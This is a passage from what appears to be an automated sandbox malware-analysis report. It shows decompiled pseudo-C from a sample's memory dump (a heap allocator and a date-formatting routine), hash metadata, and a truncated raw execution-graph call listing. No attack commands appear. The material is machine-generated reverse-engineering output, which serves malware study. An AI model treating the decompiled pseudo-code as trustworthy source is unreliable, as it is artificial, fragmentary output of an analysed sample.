                                                                                                											 *(_t196 + _t202) =  *(_t196 + _t202) & 0xfffffff7;
                                                                                                											_t203 = _t202 + 4;
                                                                                                										}
                                                                                                										_t204 = _t203 | _t136;
                                                                                                										__eflags = _t204;
                                                                                                										 *(_t196 - 4) = _t204;
                                                                                                										 *0x2191710 = 0;
                                                                                                										_t80 = _t196;
                                                                                                										L49:
                                                                                                										return _t80;
                                                                                                									} else {
                                                                                                										while(1) {
                                                                                                											asm("lock cmpxchg [0x2191710], ah");
                                                                                                											if(__eflags == 0) {
                                                                                                												break;
                                                                                                											}
                                                                                                											Sleep(0);
                                                                                                											_t166 = _t166;
                                                                                                											_t154 = _t154;
                                                                                                											asm("lock cmpxchg [0x2191710], ah");
                                                                                                											if(__eflags != 0) {
                                                                                                												Sleep(0xa);
                                                                                                												_t166 = _t166;
                                                                                                												_t154 = _t154;
                                                                                                												continue;
                                                                                                											}
                                                                                                											break;
                                                                                                										}
                                                                                                										_t136 = 0x0000000f &  *(_t196 - 4);
                                                                                                										_t100 =  *(_t182 - 4);
                                                                                                										__eflags = _t100 & 0x00000001;
                                                                                                										if((_t100 & 0x00000001) == 0) {
                                                                                                											L50:
                                                                                                											 *0x2191710 = 0;
                                                                                                											goto L51;
                                                                                                										} else {
                                                                                                											_t86 = _t100 & 0xfffffff0;
                                                                                                											_t202 = _t154 + _t86;
                                                                                                											__eflags = _t166 - _t202;
                                                                                                											if(_t166 > _t202) {
                                                                                                												goto L50;
                                                                                                											} else {
                                                                                                												goto L42;
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t205 = __edx + __edx;
                                                                                                							__eflags = _t205 - _t154;
                                                                                                							if(_t205 < _t154) {
                                                                                                								__eflags = __edx - 0xb2c;
                                                                                                								if(__edx >= 0xb2c) {
                                                                                                									L19:
                                                                                                									_t16 = _t166 + 0xd3; // 0xbff
                                                                                                									_t208 = (_t16 & 0xffffff00) + 0x30;
                                                                                                									_t157 = _t154 + 4 - _t208;
                                                                                                									__eflags =  *0x2191045;
                                                                                                									if(__eflags != 0) {
                                                                                                										while(1) {
                                                                                                											asm("lock cmpxchg [0x2191710], ah");
                                                                                                											if(__eflags == 0) {
                                                                                                												break;
                                                                                                											}
                                                                                                											Sleep(0);
                                                                                                											_t157 = _t157;
                                                                                                											asm("lock cmpxchg [0x2191710], ah");
                                                                                                											if(__eflags != 0) {
                                                                                                												Sleep(0xa);
                                                                                                												_t157 = _t157;
                                                                                                												continue;
                                                                                                											}
                                                                                                											break;
                                                                                                										}
                                                                                                										_t136 = 0x0000000f &  *(_t196 - 4);
                                                                                                										__eflags = 0xf;
                                                                                                									}
                                                                                                									 *(_t196 - 4) = _t136 | _t208;
                                                                                                									_t139 = _t157;
                                                                                                									_t174 =  *(_t182 - 4);
                                                                                                									__eflags = _t174 & 0x00000001;
                                                                                                									if((_t174 & 0x00000001) != 0) {
                                                                                                										_t102 = _t182;
                                                                                                										_t175 = _t174 & 0xfffffff0;
                                                                                                										_t139 = _t139 + _t175;
                                                                                                										_t182 = _t182 + _t175;
                                                                                                										__eflags = _t175 - 0xb30;
                                                                                                										if(_t175 >= 0xb30) {
                                                                                                											E021714F0(_t102);
                                                                                                										}
                                                                                                									} else {
                                                                                                										 *(_t182 - 4) = _t174 | 0x00000008;
                                                                                                									}
                                                                                                									 *((intOrPtr*)(_t182 - 8)) = _t139;
                                                                                                									 *((intOrPtr*)(_t196 + _t208 - 4)) = _t139 + 3;
                                                                                                									__eflags = _t139 - 0xb30;
                                                                                                									if(_t139 >= 0xb30) {
                                                                                                										E02171530(_t196 + _t208, _t157, _t139);
                                                                                                									}
                                                                                                									 *0x2191710 = 0;
                                                                                                									return _t196;
                                                                                                								} else {
                                                                                                									__eflags = _t205 - 0xb2c;
                                                                                                									if(_t205 < 0xb2c) {
                                                                                                										_t190 = __edx;
                                                                                                										_t111 = E02171754(__edx);
                                                                                                										__eflags = _t111;
                                                                                                										if(_t111 != 0) {
                                                                                                											E021714D4(_t196, _t190, _t111);
                                                                                                											E02171ABC(_t196, _t190);
                                                                                                										}
                                                                                                										return _t111;
                                                                                                									} else {
                                                                                                										_t166 = 0xb2c;
                                                                                                										goto L19;
                                                                                                									}
                                                                                                								}
                                                                                                							} else {
                                                                                                								return __eax;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t141 =  *_t145;
                                                                                                					_t160 = ( *(_t141 + 2) & 0x0000ffff) - 4;
                                                                                                					if(_t160 < __edx) {
                                                                                                						_push(__edi);
                                                                                                						_t193 = __edx;
                                                                                                						asm("adc eax, 0xffffffff");
                                                                                                						_t119 = E02171754((0 & _t160 + _t160 + 0x00000020 - __edx) + __edx);
                                                                                                						__eflags = _t119;
                                                                                                						if(_t119 != 0) {
                                                                                                							__eflags = _t193 - 0x40a2c;
                                                                                                							if(_t193 > 0x40a2c) {
                                                                                                								 *((intOrPtr*)(_t119 - 8)) = _t193;
                                                                                                							}
                                                                                                							__eflags = ( *(_t141 + 2) & 0x0000ffff) - 4;
                                                                                                							_t195 = _t119;
                                                                                                							 *((intOrPtr*)(_t141 + 0x1c))();
                                                                                                							E02171ABC(_t196, _t195);
                                                                                                							_t119 = _t195;
                                                                                                						}
                                                                                                						return _t119;
                                                                                                					} else {
                                                                                                						if(0x40 + __edx * 4 < _t160) {
                                                                                                							_t143 = __edx;
                                                                                                							_t125 = E02171754(__edx);
                                                                                                							__eflags = _t125;
                                                                                                							if(_t125 != 0) {
                                                                                                								E021714D4(_t196, _t143, _t125);
                                                                                                								E02171ABC(_t196, __edi);
                                                                                                								return _t125;
                                                                                                							}
                                                                                                							return _t125;
                                                                                                						} else {
                                                                                                							return __eax;
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                			}


                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 49bc50b9f22f3ee767c68eebfadacf91fc851553d5140a1e6982810560a67498
                                                                                                • Instruction ID: 3aa3ccdbb2cd2cfbe1606c134901c9ad1ec9b278654d47851e55cf00d4567c39
                                                                                                • Opcode Fuzzy Hash: 49bc50b9f22f3ee767c68eebfadacf91fc851553d5140a1e6982810560a67498
                                                                                                • Instruction Fuzzy Hash: 13A105727906002FD719AA7CDC943BEB3E69BC4325F28467EE11DCB381EB65C9858750
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 76%
                                                                                                			E02179718(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
                                                                                                				char _v8;
                                                                                                				short _v18;
                                                                                                				short _v22;
                                                                                                				struct _SYSTEMTIME _v24;
                                                                                                				char _v280;
                                                                                                				intOrPtr _v284;
                                                                                                				char* _t34;
                                                                                                				intOrPtr* _t50;
                                                                                                				intOrPtr _t59;
                                                                                                				void* _t64;
                                                                                                				intOrPtr _t66;
                                                                                                				void* _t70;
                                                                                                
                                                                                                				_v8 = 0;
                                                                                                				_t50 = __edx;
                                                                                                				_t64 = __eax;
                                                                                                				_push(_t70);
                                                                                                				_push(0x2179806);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t70 + 0xfffffee8;
                                                                                                				E021748A0(__edx);
                                                                                                				_v24 =  *(_a4 - 0xe) & 0x0000ffff;
                                                                                                				_v22 =  *(_a4 - 0x10) & 0x0000ffff;
                                                                                                				_v18 =  *(_a4 - 0x12) & 0x0000ffff;
                                                                                                				if(_t64 > 2) {
                                                                                                					E02174938( &_v8, 0x2179828);
                                                                                                				} else {
                                                                                                					E02174938( &_v8, 0x217981c);
                                                                                                				}
                                                                                                				_t34 = E02174D64(_v8);
                                                                                                				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t34,  &_v280, 0x100) != 0) {
                                                                                                					E02174B10(_t50, 0x100,  &_v280);
                                                                                                					if(_t64 == 1 &&  *((char*)( *_t50)) == 0x30) {
                                                                                                						_v284 =  *_t50;
                                                                                                						_t66 = _v284;
                                                                                                						if(_t66 != 0) {
                                                                                                							_t66 =  *((intOrPtr*)(_t66 - 4));
                                                                                                						}
                                                                                                						E02174DC4( *_t50, _t66 - 1, 2, _t50);
                                                                                                					}
                                                                                                				}
                                                                                                				_pop(_t59);
                                                                                                				 *[fs:eax] = _t59;
                                                                                                				_push(E0217980D);
                                                                                                				return E021748A0( &_v8);
                                                                                                			}
















                                                                                                APIs
                                                                                                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02179806), ref: 0217979E
                                                                                                • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02179806), ref: 021797A4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: DateFormatLocaleThread
                                                                                                • String ID: yyyy
                                                                                                • API String ID: 3303714858-3145165042
                                                                                                • Opcode ID: c70230de2eec5c5ed9e5ec3094f83b1d0dc367eb8280f85448fe33c28ec23fc4
                                                                                                • Instruction ID: 8b46352951c1f9fadeb6d311b8e6b1654ebb6ba01833758a4f2fceb1a80a7144
                                                                                                • Opcode Fuzzy Hash: c70230de2eec5c5ed9e5ec3094f83b1d0dc367eb8280f85448fe33c28ec23fc4
                                                                                                • Instruction Fuzzy Hash: D5218E75A806589FDB14DFA8C881AAEB3FAEF88700F5144A5E945E7340D7309E44CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocValue
                                                                                                • String ID: 8z~
                                                                                                • API String ID: 1189806713-3075776637
                                                                                                • Opcode ID: 8d1c9708b45a20e38c398dbc3a84f200dc27280c54f7ee19a905d10d9af2ed5c
                                                                                                • Instruction ID: fe6d96ae6673653f54cfc479f027b85f2e049d11b241c8f4d96f31846e54a0ba
                                                                                                • Opcode Fuzzy Hash: 8d1c9708b45a20e38c398dbc3a84f200dc27280c54f7ee19a905d10d9af2ed5c
                                                                                                • Instruction Fuzzy Hash: 8DC002E0DC0F819EEB04BFB6A554A1A36FDEB98354F841965B550C6144EB3AC8908FA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Execution Graph

                                                                                                Execution Coverage:0.5%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:65.1%
                                                                                                Total number of Nodes:2000
                                                                                                Total number of Limit Nodes:99
6e3b333 18734->18722 18935 6e59660 LdrInitializeThunk 18734->18935 18735 6e3b329 18735->18734 18964 6e59660 LdrInitializeThunk 18735->18964 18738 6e3b366 18739 6e828f2 18738->18739 18936 6e4138b GetPEB 18738->18936 18985 6e4174b 18739->18985 18743 6e3b3a6 18745 6e82814 GetPEB 18743->18745 18748 6e3b3b8 18743->18748 18744 6e3b3a1 18746 6e37d50 GetPEB 18744->18746 18747 6e82824 GetPEB 18745->18747 18746->18743 18749 6e3b3c3 18747->18749 18750 6e82837 18747->18750 18748->18747 18748->18749 18752 6e37d50 GetPEB 18749->18752 18965 6ed138a 18750->18965 18754 6e3b3c8 18752->18754 18756 6e8287a GetPEB 18754->18756 18757 6e3b3da 18754->18757 18755 6e37d50 GetPEB 18760 6e8284b 18755->18760 18758 6e8288a 18756->18758 18757->18758 18759 6e3b3e5 18757->18759 18762 6e37d50 GetPEB 18758->18762 18761 6e37d50 GetPEB 18759->18761 18763 6e8285a 18760->18763 18764 6e8284f GetPEB 18760->18764 18765 6e3b3ea 18761->18765 18766 6e8288f 18762->18766 18973 6ed1582 18763->18973 18764->18763 18768 6e3b3f2 18765->18768 18769 6e828be GetPEB 18765->18769 18770 6e8289e 18766->18770 18771 6e82893 GetPEB 18766->18771 18774 6e3b400 18768->18774 18977 6ecfec0 18768->18977 18769->18768 18772 6ed1582 12 API calls 18770->18772 18771->18770 18772->18765 18775 6ecfa2b 28 API calls 18774->18775 18774->18776 18775->18776 19004 6e3b8e4 18777->19004 18780 6e82957 GetPEB 18783 6e82980 18780->18783 18784 6e82963 GetPEB 18780->18784 18781 6e3b65a 18789 6e3b6f5 18781->18789 18790 6e82ad1 18781->18790 18795 6e3b66c GetPEB 18781->18795 18782 6e5b640 _vswprintf_s 12 API calls 18785 6e3b260 18782->18785 18786 6e1b150 _vswprintf_s 12 API calls 18783->18786 18787 6e1b150 _vswprintf_s 12 API calls 18784->18787 18785->18721 18785->18727 18792 6e8297d 18786->18792 18787->18792 18788 6e3b51f 19018 6e59660 LdrInitializeThunk 18788->19018 18789->18795 18796 6eda80d 28 API calls 18790->18796 18791 6e3b4ba 18791->18781 18791->18788 18803 6e829af 18791->18803 18794 6e1b150 _vswprintf_s 12 API calls 18792->18794 18798 6e82995 
18794->18798 18799 6e82add 18795->18799 18800 6e3b680 18795->18800 18796->18799 18797 6e3b535 18801 6e3b543 GetPEB 18797->18801 18820 6e3b6b1 18797->18820 18798->18791 19043 6ed2073 18798->19043 18799->18800 18802 6e82aee GetPEB 18799->18802 18808 6e3b690 GetPEB 18800->18808 18809 6e82b06 GetPEB 18800->18809 18804 6e3b554 18801->18804 18805 6e82a12 18801->18805 18802->18800 19053 6eda80d 18803->19053 18815 6e3b562 18804->18815 18816 6e82a2e GetPEB 18804->18816 18805->18804 18810 6e82a1b GetPEB 18805->18810 18811 6e3b6a6 18808->18811 18812 6e82b4f 18808->18812 18809->18808 18813 6e82b19 18809->18813 18810->18804 18811->18820 18821 6e82b6b 18811->18821 18812->18811 18814 6e82b58 GetPEB 18812->18814 18817 6e37d50 GetPEB 18813->18817 18814->18811 18818 6e3b588 18815->18818 18827 6ecfa2b 28 API calls 18815->18827 18816->18815 18819 6e82a41 18816->18819 18822 6e82b1e 18817->18822 18828 6eda80d 28 API calls 18818->18828 18840 6e3b5b8 18818->18840 18824 6ed138a 14 API calls 18819->18824 18820->18782 18823 6e37d50 GetPEB 18821->18823 18825 6e82b31 18822->18825 18826 6e82b22 GetPEB 18822->18826 18829 6e82b70 18823->18829 18824->18815 18830 6ed1582 12 API calls 18825->18830 18826->18825 18827->18818 18828->18840 18832 6e82b83 18829->18832 18833 6e82b74 GetPEB 18829->18833 18831 6e82b4a 18830->18831 18831->18808 18834 6ed1582 12 API calls 18832->18834 18833->18832 18836 6e82b9c 18834->18836 18835 6e3b5d4 18837 6eda80d 28 API calls 18835->18837 18839 6e3b5f2 18835->18839 18836->18836 18837->18839 18839->18781 19019 6e3b73d 18839->19019 18840->18835 18840->18839 19057 6e3bc04 18840->19057 18844 6e399e5 18842->18844 18900 6e399f5 18842->18900 18843 6e39a6e 18845 6e81466 18843->18845 18846 6e39a7c 18843->18846 18844->18843 18849 6ecfa2b 28 API calls 18844->18849 18844->18900 18850 6e8159c 18845->18850 18858 6e81487 18845->18858 18848 6e8166a 18846->18848 18860 6e39a9d 18846->18860 18847 6e39a3d 18906 6e3a830 18847->18906 18852 6eda80d 28 API calls 18848->18852 18849->18843 18851 
6eda80d 28 API calls 18850->18851 18854 6e39b2b 18851->18854 18852->18900 18853 6e814c0 18859 6e3a229 39 API calls 18853->18859 18869 6e814f2 18853->18869 18862 6e3a309 81 API calls 18854->18862 18855 6e39ad7 18867 6e39ae8 18855->18867 19146 6e3a229 18855->19146 18856 6eda80d 28 API calls 18856->18900 18857 6ecfa2b 28 API calls 18857->18900 18858->18853 18866 6e3bc04 28 API calls 18858->18866 18863 6e814da 18859->18863 18860->18855 18864 6e3bc04 28 API calls 18860->18864 18862->18900 18868 6e814de 18863->18868 18863->18869 18864->18855 18865 6e39b27 18865->18854 18865->18867 18866->18853 18872 6e815f9 GetPEB 18867->18872 18867->18900 19193 6e3a309 18868->19193 18869->18854 18873 6e81532 GetPEB 18869->18873 18871 6e3a229 39 API calls 18871->18900 18876 6e81624 18872->18876 18877 6e81606 GetPEB 18872->18877 18878 6e8155d 18873->18878 18879 6e8153f GetPEB 18873->18879 18874 6e818a7 18874->18847 18885 6e818e7 GetPEB 18874->18885 18875 6e3bc04 28 API calls 18875->18900 18881 6e1b150 _vswprintf_s 12 API calls 18876->18881 18880 6e1b150 _vswprintf_s 12 API calls 18877->18880 18884 6e1b150 _vswprintf_s 12 API calls 18878->18884 18882 6e1b150 _vswprintf_s 12 API calls 18879->18882 18886 6e81621 18880->18886 18881->18886 18887 6e8155a 18882->18887 18883 6e3a309 81 API calls 18883->18900 18884->18887 18889 6e81912 18885->18889 18890 6e818f4 GetPEB 18885->18890 18891 6e1b150 _vswprintf_s 12 API calls 18886->18891 18892 6e1b150 _vswprintf_s 12 API calls 18887->18892 18888 6e8179e GetPEB 18893 6e817ab GetPEB 18888->18893 18888->18900 18896 6e1b150 _vswprintf_s 12 API calls 18889->18896 18895 6e1b150 _vswprintf_s 12 API calls 18890->18895 18897 6e81643 GetPEB 18891->18897 18898 6e8157c GetPEB 18892->18898 18899 6e1b150 _vswprintf_s 12 API calls 18893->18899 18894 6e1b150 _vswprintf_s 12 API calls 18894->18900 18901 6e8190f 18895->18901 18896->18901 18897->18900 18898->18854 18899->18900 18900->18847 18900->18856 18900->18857 18900->18871 18900->18874 18900->18875 18900->18883 
18900->18888 18900->18894 18902 6e1b150 _vswprintf_s 12 API calls 18900->18902 18903 6e1b150 _vswprintf_s 12 API calls 18901->18903 18904 6e817e8 GetPEB 18902->18904 18905 6e81931 GetPEB 18903->18905 18904->18900 18905->18847 18920 6e3a850 18906->18920 18929 6e3aa53 18906->18929 18907 6e822bb GetPEB 18908 6e822c7 GetPEB 18907->18908 18907->18920 18910 6e1b150 _vswprintf_s 12 API calls 18908->18910 18909 6eda80d 28 API calls 18909->18920 18910->18920 18911 6e82385 18913 6eda80d 28 API calls 18911->18913 18912 6e3ab40 28 API calls 18912->18920 18915 6e3aa3c 18913->18915 18914 6e1b150 12 API calls _vswprintf_s 18914->18920 18918 6e823cb GetPEB 18915->18918 18915->18929 18916 6ed2073 28 API calls 18916->18920 18917 6e82376 18919 6eda80d 28 API calls 18917->18919 18921 6e823f6 18918->18921 18922 6e823d7 GetPEB 18918->18922 18919->18911 18920->18907 18920->18909 18920->18911 18920->18912 18920->18914 18920->18915 18920->18916 18920->18917 18920->18929 18924 6e1b150 _vswprintf_s 12 API calls 18921->18924 18923 6e1b150 _vswprintf_s 12 API calls 18922->18923 18925 6e823f1 18923->18925 18924->18925 18926 6e1b150 _vswprintf_s 12 API calls 18925->18926 18927 6e8240d 18926->18927 18928 6ed2073 28 API calls 18927->18928 18927->18929 18928->18929 18929->18729 18931 6e4069c 18930->18931 18933 6e3b30f 18930->18933 18932 6eda80d 28 API calls 18931->18932 18931->18933 18932->18933 18934 6e59660 LdrInitializeThunk 18933->18934 18934->18735 18935->18738 18946 6e413b9 18936->18946 18937 6e413ea 18938 6e416c7 LdrInitializeThunk 18937->18938 18940 6e4141f 18937->18940 18938->18940 18939 6e40678 28 API calls 18939->18946 18941 6e41482 18940->18941 18944 6eda80d 28 API calls 18940->18944 18943 6e3b73d 32 API calls 18941->18943 18948 6e414a0 18943->18948 18944->18941 18945 6e8555b 18947 6e37d50 GetPEB 18945->18947 18946->18937 18946->18939 18946->18945 19435 6e59660 LdrInitializeThunk 18946->19435 18949 6e85560 18947->18949 18952 6e414c9 18948->18952 18953 6e3a830 32 API calls 18948->18953 
18950 6e85574 18949->18950 18951 6e85564 GetPEB 18949->18951 18950->18937 18956 6e8557e GetPEB 18950->18956 18951->18950 18954 6e3b391 18952->18954 18955 6eda80d 28 API calls 18952->18955 18953->18952 18954->18739 18954->18743 18954->18744 18957 6e855ef 18955->18957 18956->18937 18958 6e8558d 18956->18958 18957->18957 18959 6ed138a 14 API calls 18958->18959 18959->18937 18963 6ecfa37 _vswprintf_s 18960->18963 18961 6ecfcda _vswprintf_s 18961->18776 18962 6eda80d 28 API calls 18962->18961 18963->18961 18963->18962 18964->18735 18966 6ed13af _vswprintf_s 18965->18966 18967 6e37d50 GetPEB 18966->18967 18968 6ed13d2 18967->18968 18969 6ed13e6 _vswprintf_s 18968->18969 18970 6ed13d6 GetPEB 18968->18970 18971 6e5b640 _vswprintf_s 12 API calls 18969->18971 18970->18969 18972 6e82846 18971->18972 18972->18755 18974 6ed15bd _vswprintf_s 18973->18974 18975 6e5b640 _vswprintf_s 12 API calls 18974->18975 18978 6ecfee5 _vswprintf_s 18977->18978 18979 6e37d50 GetPEB 18978->18979 18980 6ecff02 18979->18980 18981 6ecff06 GetPEB 18980->18981 18982 6ecff16 _vswprintf_s 18980->18982 18981->18982 18983 6e5b640 _vswprintf_s 12 API calls 18982->18983 18984 6ecff3b 18983->18984 18984->18774 19436 6e596e0 LdrInitializeThunk 18985->19436 18987 6e41765 18988 6e41773 18987->18988 18989 6ec3c60 13 API calls 18987->18989 18988->18722 18990 6e8562b 18989->18990 18990->18988 19437 6e596e0 LdrInitializeThunk 18990->19437 18993 6ebccf7 18992->18993 18997 6ebcb72 18992->18997 18993->18776 18994 6e399bf 93 API calls 18994->18997 18995 6ecfa2b 28 API calls 18995->18997 18996 6eda80d 28 API calls 18996->18997 18997->18994 18997->18995 18997->18996 18998 6e3a229 39 API calls 18997->18998 18999 6e3a830 32 API calls 18997->18999 19000 6e3a309 93 API calls 18997->19000 19001 6e3bc04 28 API calls 18997->19001 19002 6ebccc4 18997->19002 18998->18997 18999->18997 19000->18997 19001->18997 19002->18993 19003 6ecfa2b 28 API calls 19002->19003 19003->18993 19005 6e82c43 19004->19005 19017 6e3b8fa 19004->19017 
19006 6e82c56 GetPEB 19005->19006 19005->19017 19008 6e82c7f 19006->19008 19009 6e82c62 GetPEB 19006->19009 19007 6e3b49a 19007->18780 19007->18791 19007->18820 19011 6e1b150 _vswprintf_s 12 API calls 19008->19011 19010 6e1b150 _vswprintf_s 12 API calls 19009->19010 19012 6e82c7c 19010->19012 19011->19012 19014 6e1b150 _vswprintf_s 12 API calls 19012->19014 19015 6e82c94 19014->19015 19016 6ed2073 28 API calls 19015->19016 19015->19017 19016->19017 19017->19007 19062 6e3ab40 19017->19062 19018->18797 19020 6e3b855 19019->19020 19021 6e3b77c 19019->19021 19020->19021 19022 6eda80d 28 API calls 19020->19022 19023 6e82bbf GetPEB 19021->19023 19026 6e3b78e 19021->19026 19022->19021 19024 6e82be8 19023->19024 19025 6e82bcb GetPEB 19023->19025 19028 6e1b150 _vswprintf_s 12 API calls 19024->19028 19027 6e1b150 _vswprintf_s 12 API calls 19025->19027 19030 6e3b8e4 30 API calls 19026->19030 19038 6e3b7e2 19026->19038 19029 6e82be5 19027->19029 19028->19029 19031 6e1b150 _vswprintf_s 12 API calls 19029->19031 19033 6e3b7bf 19030->19033 19032 6e82bfd 19031->19032 19032->19026 19035 6ed2073 28 API calls 19032->19035 19034 6e82c18 19033->19034 19041 6e3b7ca 19033->19041 19036 6eda80d 28 API calls 19034->19036 19035->19026 19036->19038 19037 6eda80d 28 API calls 19040 6e82c3e 19037->19040 19038->19037 19039 6e3b800 19038->19039 19039->18781 19040->19040 19041->19038 19070 6e3e4a0 19041->19070 19074 6ecfd22 19043->19074 19045 6ed207d 19046 6ed2085 19045->19046 19047 6ed20a4 19045->19047 19077 6ec8df1 19046->19077 19049 6ed20be 19047->19049 19085 6ed1c06 GetPEB 19047->19085 19049->18791 19054 6eda81c 19053->19054 19055 6eda84e 19053->19055 19142 6ecff41 19054->19142 19055->18820 19058 6e3bc24 19057->19058 19059 6eda80d 28 API calls 19058->19059 19061 6e3bc5f 19058->19061 19060 6e82d06 19059->19060 19061->18835 19063 6e3ab6e 19062->19063 19068 6e3abbb 19062->19068 19064 6eda80d 28 API calls 19063->19064 19066 6e3abd0 19063->19066 19063->19068 19064->19066 19065 6e3ac01 19065->19068 
19069 6eda80d 28 API calls 19065->19069 19066->19065 19067 6eda80d 28 API calls 19066->19067 19067->19065 19068->19007 19069->19065 19071 6e3e4c0 19070->19071 19072 6eda80d 28 API calls 19071->19072 19073 6e3e4db 19071->19073 19072->19073 19073->19038 19075 6e59670 _vswprintf_s LdrInitializeThunk 19074->19075 19076 6ecfd3d 19075->19076 19076->19045 19141 6e6d0e8 19077->19141 19079 6ec8dfd GetPEB 19080 6ec8e10 19079->19080 19081 6ea5720 _vswprintf_s 12 API calls 19080->19081 19082 6ec8e2f 19080->19082 19081->19082 19083 6e6d130 _vswprintf_s 12 API calls 19082->19083 19084 6ec8ebd 19083->19084 19084->18791 19086 6ed1c3d 19085->19086 19087 6ed1c20 GetPEB 19085->19087 19089 6e1b150 _vswprintf_s 12 API calls 19086->19089 19088 6e1b150 _vswprintf_s 12 API calls 19087->19088 19090 6ed1c3a 19088->19090 19089->19090 19091 6e1b150 _vswprintf_s 12 API calls 19090->19091 19092 6ed1c5a GetPEB 19091->19092 19094 6ed1d04 19092->19094 19095 6ed1ce7 GetPEB 19092->19095 19097 6e1b150 _vswprintf_s 12 API calls 19094->19097 19096 6e1b150 _vswprintf_s 12 API calls 19095->19096 19098 6ed1d01 19096->19098 19097->19098 19099 6e1b150 _vswprintf_s 12 API calls 19098->19099 19100 6ed1d1c 19099->19100 19101 6ed1d66 19100->19101 19102 6ed1d27 GetPEB 19100->19102 19103 6ed1daf 19101->19103 19104 6ed1d70 GetPEB 19101->19104 19105 6ed1d4f 19102->19105 19106 6ed1d32 GetPEB 19102->19106 19111 6ed1db9 GetPEB 19103->19111 19112 6ed1df8 19103->19112 19109 6ed1d98 19104->19109 19110 6ed1d7b GetPEB 19104->19110 19108 6e1b150 _vswprintf_s 12 API calls 19105->19108 19107 6e1b150 _vswprintf_s 12 API calls 19106->19107 19116 6ed1d4c 19107->19116 19108->19116 19115 6e1b150 _vswprintf_s 12 API calls 19109->19115 19113 6e1b150 _vswprintf_s 12 API calls 19110->19113 19117 6ed1dc4 GetPEB 19111->19117 19118 6ed1de1 19111->19118 19114 6ed1e0a GetPEB 19112->19114 19120 6ed1e52 GetPEB 19112->19120 19124 6ed1d95 19113->19124 19121 6ed1e15 GetPEB 19114->19121 19122 6ed1e32 19114->19122 19115->19124 19123 6e1b150 
_vswprintf_s 12 API calls 19116->19123 19125 6e1b150 _vswprintf_s 12 API calls 19117->19125 19119 6e1b150 _vswprintf_s 12 API calls 19118->19119 19128 6ed1dde 19119->19128 19126 6ed1e5d GetPEB 19120->19126 19127 6ed1e7a 19120->19127 19129 6e1b150 _vswprintf_s 12 API calls 19121->19129 19131 6e1b150 _vswprintf_s 12 API calls 19122->19131 19123->19101 19130 6e1b150 _vswprintf_s 12 API calls 19124->19130 19125->19128 19134 6e1b150 _vswprintf_s 12 API calls 19126->19134 19135 6e1b150 _vswprintf_s 12 API calls 19127->19135 19132 6e1b150 _vswprintf_s 12 API calls 19128->19132 19133 6ed1e2f 19129->19133 19130->19103 19131->19133 19132->19112 19137 6e1b150 _vswprintf_s 12 API calls 19133->19137 19136 6ed1e77 19134->19136 19135->19136 19139 6e1b150 _vswprintf_s 12 API calls 19136->19139 19138 6ed1e4f 19137->19138 19138->19120 19140 6ed1e90 GetPEB 19139->19140 19140->19049 19141->19079 19143 6ecff4d _vswprintf_s 19142->19143 19144 6ecffaf _vswprintf_s 19143->19144 19145 6ed2073 28 API calls 19143->19145 19144->19055 19145->19144 19153 6e3a249 19146->19153 19147 6e3a265 19331 6e59660 LdrInitializeThunk 19147->19331 19149 6e3a27e 19150 6e81db5 GetPEB 19149->19150 19152 6e37d50 GetPEB 19149->19152 19155 6e81de4 19150->19155 19156 6e81dc7 GetPEB 19150->19156 19151 6e81c9e 19154 6eda80d 28 API calls 19151->19154 19157 6e3a28d 19152->19157 19153->19147 19153->19151 19158 6e81cb0 19154->19158 19160 6e1b150 _vswprintf_s 12 API calls 19155->19160 19159 6e1b150 _vswprintf_s 12 API calls 19156->19159 19161 6e81cb8 GetPEB 19157->19161 19162 6e3a29a 19157->19162 19158->18865 19163 6e81de1 19159->19163 19160->19163 19164 6e81ccb GetPEB 19161->19164 19162->19164 19165 6e3a2a5 19162->19165 19166 6e1b150 _vswprintf_s 12 API calls 19163->19166 19164->19165 19168 6e81cde 19164->19168 19167 6e37d50 GetPEB 19165->19167 19169 6e81e03 19166->19169 19170 6e3a2ba 19167->19170 19171 6ed138a 14 API calls 19168->19171 19172 6e3a2c2 19170->19172 19173 6e81cf4 GetPEB 19170->19173 19171->19165 19174 
